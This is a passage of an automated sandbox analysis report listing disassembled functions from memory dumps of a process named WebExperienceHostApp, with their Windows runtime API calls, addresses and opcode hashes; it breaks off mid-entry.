Instruction Fuzzy Hash: 09823CA1B0BA0399EB81DF25E871AB937A6BF44784B445035E92E577FDDEBCE4418300

Function 00007FFDFBA65F40 Relevance: 5.3, APIs: 3, Instructions: 808COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA78040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFDFBA43832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFDFBA7804F

Part of subcall function 00007FFDFBA92B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45AA8), ref: 00007FFDFBA92B36

Part of subcall function 00007FFDFBA644F8: localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFDFBA5AA1C), ref: 00007FFDFBA64539
Part of subcall function 00007FFDFBA644F8: _Getvals.LIBCPMT ref: 00007FFDFBA64575

_W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF08), ref: 00007FFDFBA66A1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF08), ref: 00007FFDFBA66A30
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF08), ref: 00007FFDFBA66A47

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$GettnamesGetvals_lock_localeslocaleconvmalloc
String ID:
API String ID: 4046447902-0
Opcode ID: bedf28c8c434659652b56425a752b8efcb6f46d13c27a4a9a6688eff6c901d28
Instruction ID: e801f77e62a54b701511a7877aa9ba373a8d7e21df6a0979a0815c9a9dc216cb
Opcode Fuzzy Hash: bedf28c8c434659652b56425a752b8efcb6f46d13c27a4a9a6688eff6c901d28
Instruction Fuzzy Hash: BB825AA1F0BA0398EB91DF29E861AB937A1BF44784B445035E92E573FDDEBCE4418700

Function 00007FFDFBA75010 Relevance: 5.0, APIs: 3, Instructions: 503COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA728E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA729E2

Part of subcall function 00007FFDFBA78040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFDFBA43832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFDFBA7804F

_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FEF7,?,?,?,?,?,?,?,00007FFDFBA4F897), ref: 00007FFDFBA7572D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FEF7,?,?,?,?,?,?,?,00007FFDFBA4F897), ref: 00007FFDFBA75742
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FEF7,?,?,?,?,?,?,?,00007FFDFBA4F897), ref: 00007FFDFBA75750

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Gettnames_invalid_parameter_noinfo_noreturn_lock_locales
String ID:
API String ID: 962949324-0
Opcode ID: ca63c23946b59551808c2ed41c9c37c66fdc98cf6e1290c6b37f3c5997b2e07b
Instruction ID: e496e75fadc83cc51da14a2375eafb5adca2f15d4365bb207ceb00be042e852d
Opcode Fuzzy Hash: ca63c23946b59551808c2ed41c9c37c66fdc98cf6e1290c6b37f3c5997b2e07b
Instruction Fuzzy Hash: 8E324C61B0FA0385FB42DB25E871AB936A4FF44789B545036E92D536FEDEBCE4428340

Function 00007FF625A140E0 Relevance: 4.7, APIs: 3, Instructions: 208threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF625A141FD
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF625A14328
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF625A1439E

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
Instruction ID: eef2616796652223788f10c3269bddcc233467e2986acad6c316e07b212bac13
Opcode Fuzzy Hash: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
Instruction Fuzzy Hash: 26912726A0878285EF758F29AC463396BA1BF45F94F08C139DA4D87794DF7CE8808752

Function 00007FF625A17A60 Relevance: 3.8, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF625A17AF3
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF625A17B0A
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF625A17B18

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 8404d0afb90638662869056907e4b922b575ac63f1bdeaf2db38017825280e10
Instruction ID: 050e51c9d812e39292cf01b8d0f6348e29d9b27a32f71d0996d269fa8e933283
Opcode Fuzzy Hash: 8404d0afb90638662869056907e4b922b575ac63f1bdeaf2db38017825280e10
Instruction Fuzzy Hash: C3218E32A1864286EF60DF25E98236977A1EF94B90F449031EB4EC7696DF3CE854C741

Function 00007FFDFBA64A10 Relevance: 3.3, APIs: 2, Instructions: 297COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA64DBD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA64E0B

Part of subcall function 00007FFDFBA6F6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFDFBA59A2E), ref: 00007FFDFBA6F728

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID:
API String ID: 3063020102-0
Opcode ID: 9ca4dc071eb19751b6358c9b2cf898d5059c564fb8bdd1c327911aa1a6c5f0b9
Instruction ID: 53c65edfe6bba1fb5417e83bd62c9243616bf9293048955e56e4b5ef45fdbee8
Opcode Fuzzy Hash: 9ca4dc071eb19751b6358c9b2cf898d5059c564fb8bdd1c327911aa1a6c5f0b9
Instruction Fuzzy Hash: 6AD17D62B0AB4699FB10CFA5D4606AC7372EB48B88F444132DE6D27BA8DF78E555C340

Function 00007FFDFBA64E50 Relevance: 3.3, APIs: 2, Instructions: 297COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA651FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA6524B

Part of subcall function 00007FFDFBA6F6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFDFBA59A2E), ref: 00007FFDFBA6F728

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID:
API String ID: 3063020102-0
Opcode ID: 79d540ea51c9c8684db26c2c73061a7d9b057795865d6f807bc3eefad819df45
Instruction ID: 6ff4258f13000789e809c5d41fe8bde21ac5ecf9fdba6ee1bafd8c2a23902352
Opcode Fuzzy Hash: 79d540ea51c9c8684db26c2c73061a7d9b057795865d6f807bc3eefad819df45
Instruction Fuzzy Hash: B7D16D62F0AB4699FB00CF65D4606AC7372EB48B88F454132DE6D27BA8DF78D559C340

Function 00007FFDFBA56B3C Relevance: 3.3, APIs: 2, Instructions: 254COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140_APP ref: 00007FFDFBA56BC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA56C8D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1654775311-0
Opcode ID: f488e61922aef436b5504598907c68809d2f9e99bad861a33ddb3e8b3e903fc0
Instruction ID: 24da2cc156225c8aa2a5e55583dc47bdac27d6e01473a26dde7736bc48374863
Opcode Fuzzy Hash: f488e61922aef436b5504598907c68809d2f9e99bad861a33ddb3e8b3e903fc0
Instruction Fuzzy Hash: 4DA1D262B0A69389FB108B69D820ABC37B1AF11B98F545035CE6D17BE8CF7CE581D300

Function 00007FFDFBA567BC Relevance: 3.3, APIs: 2, Instructions: 254COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140_APP ref: 00007FFDFBA56841
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5690D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1654775311-0
Opcode ID: c071987ddd9203034660ba9ef37eb721160e54cc667c50a7604a29b6ba024e6c
Instruction ID: 8e90b4eeffab0a73fe19c05b6eefd79a599d133ffa39b0a0e4815708c891c4f4
Opcode Fuzzy Hash: c071987ddd9203034660ba9ef37eb721160e54cc667c50a7604a29b6ba024e6c
Instruction Fuzzy Hash: CCA1B262F0A69785FB108B699860ABC37B1AB51B98F549035DF6D17BE8CF7CE581C300

Function 00007FFDFBA56464 Relevance: 3.2, APIs: 2, Instructions: 250COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140_APP ref: 00007FFDFBA564E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA565A6

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1654775311-0
Opcode ID: bb337b9f9481757840d770474c2193e23b0367878493d4b4d325679eebeba086
Instruction ID: 9896d5d7c2900c51d245f114a32743128db46163c62360cc462d0649b97b88bd
Opcode Fuzzy Hash: bb337b9f9481757840d770474c2193e23b0367878493d4b4d325679eebeba086
Instruction Fuzzy Hash: 7BA1B362B0A68389FB148F6999606BD3BB2AB05B98F545035CE6D17BEDCF7CE541C300

Function 00007FFDFBA4B2C8 Relevance: 3.2, APIs: 2, Instructions: 248COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140_APP ref: 00007FFDFBA4B346
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4B40A

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1654775311-0
Opcode ID: 00d1b1d28c26761a56a170c2d61dfcc133020e5adfdd53a827a558dcc67b8241
Instruction ID: d6990c0158ad299d7fa83e68336c10efb81554de34c18505fdfd17d333ae3462
Opcode Fuzzy Hash: 00d1b1d28c26761a56a170c2d61dfcc133020e5adfdd53a827a558dcc67b8241
Instruction Fuzzy Hash: 6DA1B366B0A682C9FB118B6594606BC3B71AB05B98F544435CF6E17BF9CFBCE541C300

Function 00007FFDFBA4A690 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA49DEC: memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49E3A

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A775
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4A7DF

Part of subcall function 00007FFDFBA49B28: memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49C07

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$DiskFreeSpace_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3001910822-0
Opcode ID: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
Instruction ID: 4cf304a7fb55bb9cc288564d34862dc2a253bf625cb9983c61850b4670d1d94b
Opcode Fuzzy Hash: f83b6692a73cea2080cbce9cadfd327f0b4a4e597a4eabc9e5dd105b028ec53d
Instruction Fuzzy Hash: D8415C32B05B4288FB10CBA1D8506EC37B5BB48BA8F545625CE6D63BACEF78D185C340

Function 00007FFDFBA6FAE0 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA6FAE9
GetLocaleInfoEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA6FB02

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: InfoLocale___lc_locale_name_func
String ID:
API String ID: 3366915261-0
Opcode ID: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
Instruction ID: 19782cd512ee0648bceaa12f41c53b2a35dabfe6a19d98e5597895e782f39dff
Opcode Fuzzy Hash: 3aefda838095f36d881641da190c0c7e9a60875fb69119685df66e715777b3d5
Instruction Fuzzy Hash: 66F058B6F2E24B8AE3985A28D47AB393261EB64305F900132E51A422F8CAADD5468701

Function 00007FFDFBA6BA60 Relevance: .8, Instructions: 774COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20a8d291a807d67d3ebe4593626ecfcd307b17876e71668de1d50c8bdd57507
Instruction ID: 10c67117aff29bb9d67cd31f35f63b072f4b18cb9eb1648aca55c568aca6c95e
Opcode Fuzzy Hash: c20a8d291a807d67d3ebe4593626ecfcd307b17876e71668de1d50c8bdd57507
Instruction Fuzzy Hash: 087229A6B0AA4689EB508F19C461A7D7362FB44F88F948032DF6D07BA9DF7DD851D300

Function 00007FFDFBA6AFD0 Relevance: .8, Instructions: 774COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df20000e928d061a69dc3360d5981c551a07d285a3d79d4502343c2dcc2793e1
Instruction ID: 9fc1981f53e8044af9d544af1d5616d85ecc279452422836bd2b76ff2527b4f7
Opcode Fuzzy Hash: df20000e928d061a69dc3360d5981c551a07d285a3d79d4502343c2dcc2793e1
Instruction Fuzzy Hash: 627217BAB0AA468AEB148F16D461A7D3762FB44F88F948031DE6D07BA9CF7DD451D300

Function 00007FFDFBA769A0 Relevance: .7, Instructions: 738COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd043e71901fc21d66483f827b5135cf1f195ccc252076dba90067cad4e0e69
Instruction ID: 5dacaddd189a345a7a3241e6df2bc718795289624bd4a0d9e64be298e66a3a93
Opcode Fuzzy Hash: 5fd043e71901fc21d66483f827b5135cf1f195ccc252076dba90067cad4e0e69
Instruction Fuzzy Hash: 21724962B0AA4685EB558F1AE9A0B7C3760EB44F88F249132DE6D077E9CF7DD851D300

Function 00007FFDFBA61120 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e156633b7f18a88654c026383be2ae0ceb209a8ba85a82a8b42f20027217c75e
Instruction ID: 01361c768637cac575d3cad072be6623e7bb0575fd3ca829beccc2500811ff7c
Opcode Fuzzy Hash: e156633b7f18a88654c026383be2ae0ceb209a8ba85a82a8b42f20027217c75e
Instruction Fuzzy Hash: 17022EA6B0AA4789EB518F25C46077C3BA2EB44F88F54A031CA1E577E9CFBDD845D310

Function 00007FFDFBA73300 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db00362e69b124af2a9ba7d26aeb2bcb1db837013d4a32a9d6dd9abda21b49d
Instruction ID: ac6779fa836f1d37dddc0af758d6d156cdb343cfe835470fc586d8a7319b1b8f
Opcode Fuzzy Hash: 3db00362e69b124af2a9ba7d26aeb2bcb1db837013d4a32a9d6dd9abda21b49d
Instruction Fuzzy Hash: 1B024D62B0AA4689EB518F29D46077C37A1EB40F8CF659131CA6D4B7E9CFBDD846C310

Function 00007FFDFBA4FA60 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _lock_locales
String ID:
API String ID: 3756862740-0
Opcode ID: 9c6f57f6fe4f8df524f15fd5fdb067607200c0e3db0c4d161015478e316bba9a
Instruction ID: 66d37d5284939851d7d4ed3c5c5010cd36e61064d89d773935f92063d0b3be38
Opcode Fuzzy Hash: 9c6f57f6fe4f8df524f15fd5fdb067607200c0e3db0c4d161015478e316bba9a
Instruction Fuzzy Hash: 29E16A61B0B60385FB55AF22A871AB932A4FF54B88F544135E92D432FEDFBDE5428300

Function 00007FFDFBA52430 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
